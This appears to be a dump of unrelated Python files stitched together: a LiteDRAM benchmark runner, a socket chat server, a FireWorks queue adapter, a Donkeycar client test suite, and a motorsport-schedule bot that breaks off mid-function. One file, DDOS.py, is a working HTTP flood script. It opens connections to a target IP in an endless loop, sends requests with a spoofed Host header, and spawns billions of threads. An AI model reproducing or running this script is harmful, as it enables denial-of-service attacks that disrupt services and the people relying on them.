@staticmethod
def find(pattern, output):
result = pattern.search(output)
assert result is not None, \
"Could not find pattern {} in output".format(pattern)
return int(result.group("value"))
def __init__(self, output):
self._output = output
for attr, pattern in self.patterns.items():
setattr(self, attr, self.find(pattern, output))
def __repr__(self):
d = {attr: getattr(self, attr) for attr in self.patterns.keys()}
return "BenchmarkResult(%s)" % d
# Results summary ----------------------------------------------------------------------------------
def human_readable(value):
binary_prefixes = ["", "k", "M", "G", "T"]
mult = 1.0
for prefix in binary_prefixes:
if value * mult < 1024:
break
mult /= 1024
return mult, prefix
def clocks_fmt(clocks):
return "{:d} clk".format(int(clocks))
def bandwidth_fmt(bw):
mult, prefix = human_readable(bw)
return "{:.1f} {}bps".format(bw * mult, prefix)
def efficiency_fmt(eff):
return "{:.1f} %".format(eff * 100)
def get_git_file_path(filename):
cmd = ["git", "ls-files", "--full-name", filename]
proc = subprocess.run(cmd, stdout=subprocess.PIPE, cwd=os.path.dirname(__file__))
return proc.stdout.decode().strip() if proc.returncode == 0 else ""
def get_git_revision_hash(short=False):
short = ["--short"] if short else []
cmd = ["git", "rev-parse", *short, "HEAD"]
proc = subprocess.run(cmd, stdout=subprocess.PIPE, cwd=os.path.dirname(__file__))
return proc.stdout.decode().strip() if proc.returncode == 0 else ""
class ResultsSummary:
def __init__(self, run_data, plots_dir="plots"):
self.plots_dir = plots_dir
# Because .sdram_controller_data_width may fail for unimplemented modules
def except_none(func):
try:
return func()
except:
return None
# Gather results into tabular data
column_mappings = {
"name": lambda d: d.config.name,
"sdram_module": lambda d: d.config.sdram_module,
"sdram_data_width": lambda d: d.config.sdram_data_width,
"bist_alternating": lambda d: d.config.bist_alternating,
"num_generators": lambda d: d.config.num_generators,
"num_checkers": lambda d: d.config.num_checkers,
"bist_length": lambda d: getattr(d.config.access_pattern, "bist_length", None),
"bist_random": lambda d: getattr(d.config.access_pattern, "bist_random", None),
"pattern_file": lambda d: getattr(d.config.access_pattern, "pattern_file", None),
"length": lambda d: d.config.length,
"generator_ticks": lambda d: getattr(d.result, "generator_ticks", None), # None means benchmark failure
"checker_errors": lambda d: getattr(d.result, "checker_errors", None),
"checker_ticks": lambda d: getattr(d.result, "checker_ticks", None),
"ctrl_data_width": lambda d: except_none(lambda: d.config.sdram_controller_data_width),
"sdram_memtype": lambda d: except_none(lambda: d.config.sdram_memtype),
"clk_freq": lambda d: d.config.sdram_clk_freq,
}
columns = {name: [mapping(data) for data in run_data] for name, mapping, in column_mappings.items()}
self._df = df = pd.DataFrame(columns)
# Replace None with NaN
df.fillna(value=np.nan, inplace=True)
# Compute other metrics based on ticks and configuration parameters
df["clk_period"] = 1 / df["clk_freq"]
# Bandwidth is the number of bits per time
# in case with N generators/checkers we actually process N times more data
df["write_bandwidth"] = (8 * df["length"] * df["num_generators"]) / (df["generator_ticks"] * df["clk_period"])
df["read_bandwidth"] = (8 * df["length"] * df["num_checkers"]) / (df["checker_ticks"] * df["clk_period"])
# Efficiency calculated as number of write/read commands to number of cycles spent on writing/reading (ticks)
# for multiple generators/checkers multiply by their number
df["cmd_count"] = df["length"] / (df["ctrl_data_width"] / 8)
df["write_efficiency"] = df["cmd_count"] * df["num_generators"] / df["generator_ticks"]
df["read_efficiency"] = df["cmd_count"] * df["num_checkers"] / df["checker_ticks"]
df["write_latency"] = df[df["bist_length"] == 1]["generator_ticks"]
df["read_latency"] = df[df["bist_length"] == 1]["checker_ticks"]
# Boolean distinction between latency benchmarks and sequence benchmarks,
# as thier results differ significanly
df["is_latency"] = ~pd.isna(df["write_latency"])
assert (df["is_latency"] == ~pd.isna(df["read_latency"])).all(), \
"write_latency and read_latency should both have a value or both be NaN"
# Data formatting for text summary
self.text_formatters = {
"write_bandwidth": bandwidth_fmt,
"read_bandwidth": bandwidth_fmt,
"write_efficiency": efficiency_fmt,
"read_efficiency": efficiency_fmt,
"write_latency": clocks_fmt,
"read_latency": clocks_fmt,
}
# Data formatting for plot summary
self.plot_xticks_formatters = {
"write_bandwidth": FuncFormatter(lambda value, pos: bandwidth_fmt(value)),
"read_bandwidth": FuncFormatter(lambda value, pos: bandwidth_fmt(value)),
"write_efficiency": PercentFormatter(1.0),
"read_efficiency": PercentFormatter(1.0),
"write_latency": ScalarFormatter(),
"read_latency": ScalarFormatter(),
}
def df(self, ok=True, failures=False):
is_failure = lambda df: pd.isna(df["generator_ticks"]) | pd.isna(df["checker_ticks"]) | pd.isna(df["checker_errors"])
df = self._df
if not ok: # remove ok
is_ok = ~is_failure(df)
df = df[~is_ok]
if not failures: # remove failures
df = df[~is_failure(df)]
return df
def header(self, text):
return "===> {}".format(text)
def print_df(self, title, df):
# Make sure all data will be shown
with pd.option_context("display.max_rows", None, "display.max_columns", None, "display.width", None):
print(self.header(title + ":"))
print(df)
def get_summary(self, df, mask=None, columns=None, column_formatting=None, sort_kwargs=None):
# Work on a copy
df = df.copy()
if sort_kwargs is not None:
df = df.sort_values(**sort_kwargs)
if column_formatting is not None:
for column, mapping in column_formatting.items():
old = "_{}".format(column)
df[old] = df[column].copy()
df[column] = df[column].map(lambda value: mapping(value) if not pd.isna(value) else value)
df = df[mask] if mask is not None else df
df = df[columns] if columns is not None else df
return df
def text_summary(self):
for title, df in self.groupped_results():
self.print_df(title, df)
print()
def html_summary(self, output_dir):
import jinja2
tables = {}
names = {}
for title, df in self.groupped_results():
table_id = title.lower().replace(" ", "_")
tables[table_id] = df.to_html(table_id=table_id, border=0)
names[table_id] = title
template_dir = os.path.join(os.path.dirname(__file__), "summary")
env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir))
template = env.get_template("summary.html.jinja2")
os.makedirs(output_dir, exist_ok=True)
with open(os.path.join(output_dir, "summary.html"), "w") as f:
f.write(template.render(
title = "LiteDRAM benchmarks summary",
tables = tables,
names = names,
script_path = get_git_file_path(__file__),
revision = get_git_revision_hash(),
revision_short = get_git_revision_hash(short=True),
generation_date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
))
def groupped_results(self, formatters=None):
df = self.df()
if formatters is None:
formatters = self.text_formatters
common_columns = [
"name", "sdram_module", "sdram_memtype", "sdram_data_width",
"bist_alternating", "num_generators", "num_checkers"
]
latency_columns = ["write_latency", "read_latency"]
performance_columns = [
"write_bandwidth", "read_bandwidth", "write_efficiency", "read_efficiency"
]
failure_columns = [
"bist_length", "bist_random", "pattern_file", "length",
"generator_ticks", "checker_errors", "checker_ticks"
]
yield "Latency", self.get_summary(df,
mask = df["is_latency"] == True,
columns = common_columns + latency_columns,
column_formatting = formatters,
)
yield "Custom access pattern", self.get_summary(df,
mask = (df["is_latency"] == False) & (~pd.isna(df["pattern_file"])),
columns = common_columns + ["length", "pattern_file"] + performance_columns,
column_formatting = formatters,
),
yield "Sequential access pattern", self.get_summary(df,
mask = (df["is_latency"] == False) & (pd.isna(df["pattern_file"])) & (df["bist_random"] == False),
columns = common_columns + ["bist_length"] + performance_columns, # could be length
column_formatting = formatters,
),
yield "Random access pattern", self.get_summary(df,
mask = (df["is_latency"] == False) & (pd.isna(df["pattern_file"])) & (df["bist_random"] == True),
columns = common_columns + ["bist_length"] + performance_columns,
column_formatting = formatters,
),
yield "Failures", self.get_summary(self.df(ok=False, failures=True),
columns = common_columns + failure_columns,
column_formatting = None,
),
def plot_summary(self, plots_dir="plots", backend="Agg", theme="default", save_format="png", **savefig_kw):
matplotlib.use(backend)
import matplotlib.pyplot as plt
plt.style.use(theme)
for title, df in self.groupped_results(formatters={}):
for column in self.plot_xticks_formatters.keys():
if column not in df.columns or df[column].empty:
continue
axis = self.plot_df(title, df, column)
# construct path
def path_name(name):
return name.lower().replace(" ", "_")
filename = "{}.{}".format(path_name(column), save_format)
path = os.path.join(plots_dir, path_name(title), filename)
os.makedirs(os.path.dirname(path), exist_ok=True)
# save figure
axis.get_figure().savefig(path, **savefig_kw)
if backend != "Agg":
plt.show()
def plot_df(self, title, df, column, fig_width=6.4, fig_min_height=2.2, save_format="png", save_filename=None):
if save_filename is None:
save_filename = os.path.join(self.plots_dir, title.lower().replace(" ", "_"))
axis = df.plot(kind="barh", x="name", y=column, title=title, grid=True, legend=False)
fig = axis.get_figure()
if column in self.plot_xticks_formatters:
axis.xaxis.set_major_formatter(self.plot_xticks_formatters[column])
axis.xaxis.set_tick_params(rotation=15)
axis.spines["top"].set_visible(False)
axis.spines["right"].set_visible(False)
axis.set_axisbelow(True)
axis.set_ylabel("") # No need for label as we have only one series
# For large number of rows, the bar labels start overlapping
# use fixed ratio between number of rows and height of figure
n_ok = 16
new_height = (fig_width / n_ok) * len(df)
fig.set_size_inches(fig_width, max(fig_min_height, new_height))
# Remove empty spaces
fig.tight_layout()
return axis
# Run ----------------------------------------------------------------------------------------------
class RunCache(list):
RunData = namedtuple("RunData", ["config", "result"])
def dump_json(self, filename):
json_data = [{"config": data.config.as_dict(), "output": getattr(data.result, "_output", None) } for data in self]
with open(filename, "w") as f:
json.dump(json_data, f)
@classmethod
def load_json(cls, filename):
with open(filename, "r") as f:
json_data = json.load(f)
loaded = []
for data in json_data:
config = BenchmarkConfiguration.from_dict(data["config"])
result = BenchmarkResult(data["output"]) if data["output"] is not None else None
loaded.append(cls.RunData(config=config, result=result))
return loaded
def run_python(script, args, **kwargs):
command = ["python3", script, *args]
proc = subprocess.run(command, stdout=subprocess.PIPE, cwd=os.path.dirname(script), **kwargs)
return str(proc.stdout)
BenchmarkArgs = namedtuple("BenchmarkArgs", ["config", "output_dir", "ignore_failures", "timeout"])
def run_single_benchmark(fargs):
# Run as separate process, because else we cannot capture all output from verilator
print(" {}: {}".format(fargs.config.name, " ".join(fargs.config.as_args())))
try:
args = fargs.config.as_args() + ["--output-dir", fargs.output_dir, "--log-level", "warning"]
output = run_python(benchmark.__file__, args, timeout=fargs.timeout)
result = BenchmarkResult(output)
# Exit if checker had any read error
if result.checker_errors != 0:
raise RuntimeError("Error during benchmark: checker_errors = {}, args = {}".format(
result.checker_errors, fargs.config.as_args()
))
except Exception as e:
if fargs.ignore_failures:
print(" {}: ERROR: {}".format(fargs.config.name, e))
return None
else:
raise
print(" {}: ok".format(fargs.config.name))
return result
InQueueItem = namedtuple("InQueueItem", ["index", "config"])
OutQueueItem = namedtuple("OutQueueItem", ["index", "result"])
def run_parallel(configurations, output_base_dir, njobs, ignore_failures, timeout):
from multiprocessing import Process, Queue
import queue
def worker(in_queue, out_queue, out_dir):
while True:
in_item = in_queue.get()
if in_item is None:
return
fargs = BenchmarkArgs(in_item.config, out_dir, ignore_failures, timeout)
result = run_single_benchmark(fargs)
out_queue.put(OutQueueItem(in_item.index, result))
if njobs == 0:
njobs = os.cpu_count()
print("Using {:d} parallel jobs".format(njobs))
# Use one directory per worker, as running each benchmark in separate directory
# takes too much disk space (~2GB per 100 benchmarks)
dir_pool = [os.path.join(output_base_dir, "worker_%02d" % i) for i in range(njobs)]
in_queue, out_queue = Queue(), Queue()
workers = [Process(target=worker, args=(in_queue, out_queue, dir)) for dir in dir_pool]
for w in workers:
w.start()
# Put all benchmark configurations with index to retrieve them in order
for i, config in enumerate(configurations):
in_queue.put(InQueueItem(i, config))
# Send "finish signal" for each worker
for _ in workers:
in_queue.put(None)
# Retrieve results in proper order
out_items = [out_queue.get() for _ in configurations]
results = [out.result for out in sorted(out_items, key=lambda o: o.index)]
for p in workers:
p.join()
return results
def run_benchmarks(configurations, output_base_dir, njobs, ignore_failures, timeout):
print("Running {:d} benchmarks ...".format(len(configurations)))
if njobs == 1:
results = [run_single_benchmark(BenchmarkArgs(config, output_base_dir, ignore_failures, timeout))
for config in configurations]
else:
results = run_parallel(configurations, output_base_dir, njobs, ignore_failures, timeout)
run_data = [RunCache.RunData(config, result) for config, result in zip(configurations, results)]
return run_data
def main(argv=None):
parser = argparse.ArgumentParser(description="Run LiteDRAM benchmarks and collect the results.")
parser.add_argument("config", help="YAML config file")
parser.add_argument("--names", nargs="*", help="Limit benchmarks to given names")
parser.add_argument("--regex", help="Limit benchmarks to names matching the regex")
parser.add_argument("--not-regex", help="Limit benchmarks to names not matching the regex")
parser.add_argument("--html", action="store_true", help="Generate HTML summary")
parser.add_argument("--html-output-dir", default="html", help="Output directory for generated HTML")
parser.add_argument("--plot", action="store_true", help="Generate plots with results summary")
parser.add_argument("--plot-format", default="png", help="Specify plots file format (default=png)")
parser.add_argument("--plot-backend", default="Agg", help="Optionally specify matplotlib GUI backend")
parser.add_argument("--plot-transparent", action="store_true", help="Use transparent background when saving plots")
parser.add_argument("--plot-output-dir", default="plots", help="Specify where to save the plots")
parser.add_argument("--plot-theme", default="default", help="Use different matplotlib theme")
parser.add_argument("--fail-fast", action="store_true", help="Exit on any benchmark error, do not continue")
parser.add_argument("--output-dir", default="build", help="Directory to store benchmark build output")
parser.add_argument("--njobs", default=0, type=int, help="Use N parallel jobs to run benchmarks (default=0, which uses CPU count)")
parser.add_argument("--heartbeat", default=0, type=int, help="Print heartbeat message with given interval (default=0 => never)")
parser.add_argument("--timeout", default=None, help="Set timeout for a single benchmark")
parser.add_argument("--results-cache", help="""Use given JSON file as results cache. If the file exists,
it will be loaded instead of running actual benchmarks,
else benchmarks will be run normally, and then saved
to the given file. This allows to easily rerun the script
to generate different summary without having to rerun benchmarks.""")
args = parser.parse_args(argv)
if not args.results_cache and not _summary:
print("Summary not available and not running with --results-cache - run would not produce any results! Aborting.",
file=sys.stderr)
sys.exit(1)
# Load and filter configurations
configurations = BenchmarkConfiguration.load_yaml(args.config)
filters = {
"regex": lambda config: re.search(args.regex, config.name),
"not_regex": lambda config: not re.search(args.not_regex, config.name),
"names": lambda config: config.name in args.names,
}
for arg, f in filters.items():
if getattr(args, arg):
configurations = filter(f, configurations)
configurations = list(configurations)
# Load outputs from cache if it exsits
cache_exists = args.results_cache and os.path.isfile(args.results_cache)
if args.results_cache and cache_exists:
cache = RunCache.load_json(args.results_cache)
# Take only those that match configurations
names_to_load = [c.name for c in configurations]
run_data = [data for data in cache if data.config.name in names_to_load]
else: # Run all the benchmarks normally
if args.heartbeat:
heartbeat_cmd = ["/bin/sh", "-c", "while true; do sleep %d; echo Heartbeat...; done" % args.heartbeat]
heartbeat = subprocess.Popen(heartbeat_cmd)
if args.timeout is not None:
args.timeout = int(args.timeout)
run_data = run_benchmarks(configurations, args.output_dir, args.njobs, not args.fail_fast, args.timeout)
if args.heartbeat:
heartbeat.kill()
# Store outputs in cache
if args.results_cache and not cache_exists:
cache = RunCache(run_data)
cache.dump_json(args.results_cache)
# Display summary
if _summary:
summary = ResultsSummary(run_data)
summary.text_summary()
if args.html:
summary.html_summary(args.html_output_dir)
if args.plot:
summary.plot_summary(
plots_dir=args.plot_output_dir,
backend=args.plot_backend,
theme=args.plot_theme,
save_format=args.plot_format,
transparent=args.plot_transparent,
)
# Exit with error when there is no single benchmark that succeeded
succeeded = sum(1 if d.result is not None else 0 for d in run_data)
if succeeded == 0:
sys.exit(1)
if __name__ == "__main__":
main()
|
Server.py | import socket
from threading import Thread
from clint.textui import colored
s = socket.socket()
port = int(input("Port: "))
name = input("Your Name: ")
s.bind(('', port))
s.listen(5)
c, addr = s.accept()
c.send(name.encode())
print ("Connection found",addr)
cname = c.recv(1024).decode()
print("ClientName: " + colored.red(cname) + "\n")
def receive():
while 1:
rcvdData = c.recv(1024).decode()
print (colored.red("\n" + cname + ": "), rcvdData)
print("")
if(rcvdData == "bye" or rcvdData == "Bye"):
print("\n+++++++++++++++++++++++++++++++++++")
print(colored.blue("Connection ended (Press Enter to exit)"))
print("+++++++++++++++++++++++++++++++++++\n")
break
c.close()
def send():
while 1:
sendData = input()
c.send(sendData.encode())
if(sendData == "Bye" or sendData == "bye"):
print("\n++++++++++++++++++++++")
print(colored.blue("Connection ended"))
print("++++++++++++++++++++++\n")
break
c.close()
def main():
Thread(target=receive).start()
Thread(target=send).start()
if __name__ == '__main__':
main()
|
DDOS.py | import socket
import threading
target = '192.168.1.1'
fake_ip = '192.168.1.100'
port = 80
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
s.close()
for i in range(5000000000):
thread = threading.Thread(target=attack)
thread.start()
print(thread) |
queue_adapter.py | # coding: utf-8
from __future__ import unicode_literals
"""
This module contains contracts for defining adapters to various queueing systems, e.g. PBS/SLURM/SGE.
"""
import os
import shlex
import string
import subprocess
import threading
import traceback
import abc
import collections
import six
import warnings
from fireworks.utilities.fw_serializers import FWSerializable, serialize_fw
from fireworks.utilities.fw_utilities import get_fw_logger
__author__ = 'Anubhav Jain'
__credits__ = 'Shyue Ping Ong'
__copyright__ = 'Copyright 2013, The Materials Project'
__version__ = '0.1'
__maintainer__ = 'Anubhav Jain'
__email__ = 'ajain@lbl.gov'
__date__ = 'Feb 28, 2013'
class Command(object):
"""
Helper class - run subprocess commands in a different thread with TIMEOUT option.
From https://gist.github.com/kirpit/1306188
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
"""
command = None
process = None
status = None
output, error = '', ''
def __init__(self, command):
"""
initialize the object.
Args:
command: command to run
"""
if isinstance(command, six.string_types):
command = shlex.split(command)
self.command = command
def run(self, timeout=None, **kwargs):
"""
Run the command.
Args:
timeout (float): timeout
kwargs (dict)
Returns:
(status, output, error)
"""
def target(**kwargs):
try:
self.process = subprocess.Popen(self.command, **kwargs)
self.output, self.error = self.process.communicate()
self.status = self.process.returncode
# Python3 - need to convert string to bytes
if isinstance(self.output, bytes):
self.output = self.output.decode("utf-8")
if isinstance(self.error, bytes):
self.error = self.error.decode("utf-8")
except:
self.error = traceback.format_exc()
self.status = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = subprocess.PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = subprocess.PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
return self.status, self.output, self.error
class QueueAdapterBase(collections.defaultdict, FWSerializable):
"""
The QueueAdapter is responsible for all interactions with a specific queue management system.
This includes handling all details of queue script format as well as queue submission and
management.
A user should extend this class with implementations that work on specific queue systems.
Examples and implementations are in: fireworks/user_objects/queue_adapters.
Documentation on implementing queue adapters can be found on FireWorks home page,
https://materialsproject.github.io/fireworks
"""
_fw_name = 'QueueAdapterBase'
template_file = 'OVERRIDE_ME' # path to template file for a queue script
submit_cmd = 'OVERRIDE_ME' # command to submit jobs, e.g. "qsub" or "squeue"
q_name = 'OVERRIDE_ME' # (arbitrary) name, e.g. "pbs" or "slurm"
defaults = {} # default parameter values for template
def get_script_str(self, launch_dir):
"""
returns a (multi-line) String representing the queue script, e.g. PBS script.
Uses the template_file along with internal parameters to create the script.
Args:
launch_dir (str): The directory the job will be launched in
Returns:
(str) the queue script
"""
with open(self.template_file) as f:
template = f.read()
a = QScriptTemplate(template)
# get keys defined by template
template_keys = [i[1] for i in string.Formatter().parse(template)]
# set substitution dict for replacements into the template
subs_dict = {k: v for k, v in self.items()
if v is not None} # clean null values
# warn user if they specify a key not present in template
for subs_key in subs_dict.keys():
if subs_key not in template_keys and not \
subs_key.startswith("_") and not subs_key == "logdir":
warnings.warn('Key {} has been specified in qadapter '
'but it is not present in template, please '
'check template ({}) for supported keys.'
.format(subs_key, self.template_file))
for k, v in self.defaults.items():
subs_dict.setdefault(k, v)
subs_dict['job_name'] = subs_dict.get('job_name', 'FW_job')
launch_dir = os.path.abspath(launch_dir)
subs_dict['launch_dir'] = launch_dir
# might contain unused parameters as leftover $$
unclean_template = a.safe_substitute(subs_dict)
clean_template = filter(lambda l: "$$" not in l,
unclean_template.split('\n'))
return '\n'.join(clean_template)
@abc.abstractmethod
def submit_to_queue(self, script_file):
"""
Submits the job to the queue and returns the job id.
Args:
script_file: (str) name of the script file to use (String)
Returns:
(int) job_id
"""
pass
@abc.abstractmethod
def get_njobs_in_queue(self, username=None):
"""
Returns the number of jobs currently in the queue for the user.
Args:
username (str): the username of the jobs to count (default is to autodetect)
Returns:
(int) number of jobs in the queue
"""
pass
@serialize_fw
def to_dict(self):
return dict(self)
@classmethod
def from_dict(cls, m_dict):
return cls(m_dict)
def get_qlogger(self, name):
if 'logdir' in self:
return get_fw_logger(name, self['logdir'])
else:
return get_fw_logger(name, stream_level='CRITICAL')
class QScriptTemplate(string.Template):
delimiter = '$$'
|
client.test.py | import asyncore
import logging
import socket
import sys
import time
import unittest
from threading import Thread
from gym_donkeycar.core.sim_client import SDClient
root = logging.getLogger()
root.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
handler.setFormatter(formatter)
root.addHandler(handler)
host = "localhost"
port = 10000
class EchoHandler(asyncore.dispatcher_with_send):
def handle_read(self):
data = self.recv(8192)
if data:
root.info("Server got %s" % data)
self.send(data)
class TestServer(asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(5)
self.processing_loop = True
self.handler = None
self.th = Thread(target=self.loop, args=())
self.th.start()
def handle_accept(self):
pair = self.accept()
if pair is not None:
sock, addr = pair
root.info("Incoming connection from %s" % repr(addr))
self.handler = EchoHandler(sock)
def stop(self):
root.info("Stoping Server")
self.processing_loop = False
self.th.join()
root.info("Server stoped")
def loop(self):
while self.processing_loop:
asyncore.loop(count=1)
time.sleep(0.01)
class SUT(SDClient):
def __init__(self, address):
super().__init__(*address, poll_socket_sleep_time=0.01)
self.receivedMsg = None
self.receivedCount = 0
def on_msg_recv(self, json_packet):
root.info("Got %s" % json_packet)
self.receivedMsg = json_packet
self.receivedCount += 1
def reInit(self):
self.receivedMsg = None
self.receivedCount = 0
class SDClientTest(unittest.TestCase):
@classmethod
def setUpClass(self):
self.server = TestServer(host, port)
time.sleep(1)
@classmethod
def tearDownClass(self):
self.server.stop()
def setUp(self):
self.SUT = SUT((host, port))
time.sleep(1)
self.SUT.reInit()
def tearDown(self):
self.SUT.stop()
def test_simpleMessage(self):
self.server.handler.send(b'{"msg_type":"test1"}\n')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount == 1)
def test_simpleMessageUndelimited(self):
self.server.handler.send(b'{"msg_type":"test2"}')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount == 1)
def test_SimpleConcat(self):
self.server.handler.send(b'{"msg_type":"test3"}\n{"msg_type":"test31"}')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount == 2)
def test_uncompletePayload(self):
self.server.handler.send(b'{"msg_type":"test4","tutu":')
time.sleep(1)
self.assertTrue(self.SUT.receivedCount == 0)
def test_fragmentedPayload1(self):
self.server.handler.send(b'{"msg_type":"test5"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":"test51"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount, 2)
def test_fragmentedPayload2(self):
self.server.handler.send(b'{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test6"}\n{"msg_type":"test61"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount, 2)
def test_fragmentedPayload3(self):
self.server.handler.send(b'{"msg_type":"test7"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":"test71"}\n{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test72"}')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount, 3)
def test_fragmentedPayload4(self):
self.server.handler.send(b'{"msg_type":"test8"')
time.sleep(1)
self.server.handler.send(b'}\n{"msg_type":')
time.sleep(1)
self.server.handler.send(b'"test81"}')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount, 2)
def test_fragmentedPayload5(self):
self.server.handler.send(b'{"msg_type":"test9"')
time.sleep(1)
self.server.handler.send(b"}\n{")
time.sleep(1)
self.server.handler.send(b'"msg_type":"test91"}\n')
time.sleep(1)
self.assertEqual(self.SUT.receivedCount, 2)
if __name__ == "__main__":
unittest.main()
|
motor.py | from bot import EventBot
from urllib.request import urlopen
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
# implementation of EventBot to track motorsport schedules from ESPN
MOTOR_CHANNEL = -0
TOKEN = ""
# processes schedules from ESPN.com
def process_espn(url, label):
races = []
# get rows of table
page = urlopen(url)
html = page.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
rows = soup.table.find_all("tr")
rows.pop(0)
for row in rows:
cells = row.find_all("td")
if len(cells) >= 4:
# combine date and time, then interpret
date = ''
for s in cells[0].strings:
if date:
date += ' '
date += s
date = date.replace('Noon', '12:00 PM')
if date != 'DATE':
dt = datetime.strptime(date, '%a, %b %d %I:%M %p ET')
# use track as race name
race = ''
for s in cells[1].strings:
if not race:
race = s
# interpret postponed dates
elif s.startswith("**Race postponed to "):
date = s[s.index(' to ')+4:]
dt = datetime.strptime(date, '%B %d at %I:%M %p')
# remove annoying extract cup series text
if race.startswith('NASCAR') and ' at ' in race:
start = race.index(' at ') + 4
race = race[start:]
elif race.startswith('NASCAR'):
start = race.upper().index('SERIES') + 7
race = race[start:]
# add the current year and remove an hour for central time
dt = dt.replace(year=datetime.now().year)
dt = dt - timedelta(hours=1)
tv = cells[2].string
if tv is None:
tv = 'Unknown'
# combine into EventBot compatible dictionary
races.append({
'group': label,
'event': race,
'datetime': dt,
'channel': tv
})
return races
# while ESPN has an F1 schedule like NASCAR and Indy, there is a slightly better version
def process_espn_f1(url, label):
races = []
# get rows of table
page = urlopen(url)
html = page.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
rows = soup.tbody.find_all("tr")
rows.pop(0)
for row in rows:
cells = row.find_all("td")
# interpret date time
date = cells[2].string
if " - " in date:
dt = datetime.strptime(date, '%b %d - %I:%M %p')
dt = dt.replace(year=datetime.now().year)
dt = dt - timedelta(hours=1)
# interpret race name
race = ''
for s in cells[1].strings:
if not race:
race = s
tv = cells[3].string
if tv is None:
tv = 'Unknown'
# combine into EventBot compatible dictionary
races.append({
'group': label,
'event': race,
'datetime': dt,
'channel': tv
})
return races
# processes schedules from IMSA
def process_imsa(url, label):
races = []
# get rows of table
page = urlopen(url)
html = page.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
rows = soup.find_all("div", class_="rich-text-component-container")
rows.pop(0)
for row in rows:
name = row.find("a", class_="onTv-event-title").string.strip()
date = row.find("span", class_="date-display-single").string.split(' -')[0]
dt = datetime.strptime(date, '%A, %B %d, %Y – %I:%M %p')
dt = dt - timedelta(hours=1)
# determine TV channel by image
tvimg = row.img['src'].upper()
tv = 'IMSA TV'
if 'TRACKPASS' in tvimg:
tv = 'TrackPass'
elif 'PEACOCK' in tvimg:
tv = 'Peacock'
elif 'NBC' in tvimg:
tv = 'NBC'
# combine into EventBot compatible dictionary
# if not qualifying
#if "QUALIFYING" not in name.upper():
# hide second day broadcasts starting at midnight eastern
if dt.hour != 23 or dt.minute != 0:
races.append({
'group': label,
'event': name,
'datetime': dt,
'channel': tv
})
# remove duplicate listings where one is IMSA TV
remove = []
for i in range(len(races)):
if i + 1 < len(races):
if abs(races[i]['datetime'] - races[i+1]['datetime']) < timedelta(minutes=30) and (races[i]['channel'] == 'IMSA TV' or races[i+1]['channel'] == 'IMSA TV') and (races[i]['channel'] != 'IMSA TV' or races[i+1]['channel'] != 'IMSA TV'):
if races[i]['channel'] == 'IMSA TV':
remove.append(i)
elif races[i+1]['channel'] == 'IMSA TV':
remove.append(i+1)
for i in sorted(remove, reverse=True):
del races[i]
return races
# processes schedules from ENASCAR.com
def process_enascar(url, label):
races = []
# get rows of table
page = urlopen(url)
html = page.read().decode("utf-8")
soup = BeautifulSoup(html, "html.parser")
rows = soup.find_all("div", class_='tableRowContainer', recursive=True)
rows.pop(0)
for row in rows:
name = row.find('div', class_='trackCell').string
watch = row.find('div', class_='watchCell').string
# time only listed for upcoming events
if 'on' in watch:
parts = watch.split()
date = '{0} {1}'.format(row.find('div', class_='dateCell').string, parts[0])
dt = datetime.strptime(date, '%B %d, %Y %I%p')
dt = dt - timedelta(hours=1)
races.append({
'group': label,
'event': name,
'datetime': dt,
'channel': parts[-1]
})
return races
# create bot
bot = EventBot(TOKEN, "Motorsport Bot", "It sources NASCAR, IndyCar, and F1 schedules from ESPN.com", "series", "race")
# handle /next
@bot.tb.message_handler(commands=['next'])
def read_msg(msg):
bot.next_msg(msg)
# handle /last
@bot.tb.message_handler(commands=['last'])
def read_msg(msg):
bot.last_msg(msg)
# handle /time
@bot.tb.message_handler(commands=['time'])
def read_msg(msg):
bot.time_msg(msg)
# handle /about
@bot.tb.message_handler(commands=['about'])
def read_msg(msg):
bot.about_msg(msg)
# handle /help
@bot.tb.message_handler(commands=['help'])
def read_msg(msg):
bot.help_msg(msg)
# handle /groups
@bot.tb.message_handler(commands=['groups'])
def read_msg(msg):
bot.groups_msg(msg)
# handle all other messages
@bot.tb.message_handler(func=lambda _: True)
def read_msg(msg):
bot.default_msg(msg)
# thread to update list of races every day
def add_races(bot):
while True:
races = process_espn("https://www.espn.com/racing/schedule", "NCS")
races += process_espn("https://www.espn.com/racing/schedule/_/series/xfinity", "NXS")
races += process_espn("https://www.espn.com/racing/schedule/_/series/camping", "NCWTS")
races += process_espn("https://www.espn.com/racing/schedule/_/series/indycar", "INDY")
races += process_espn_f1("https://www.espn.com/f1/schedule", "F1")
races += process_imsa("https://www.imsa.com/weathertech/tv-streaming-schedule/", "IMSA")
races += process_enascar("https://www.enascar.com/schedule/", "ENAS")
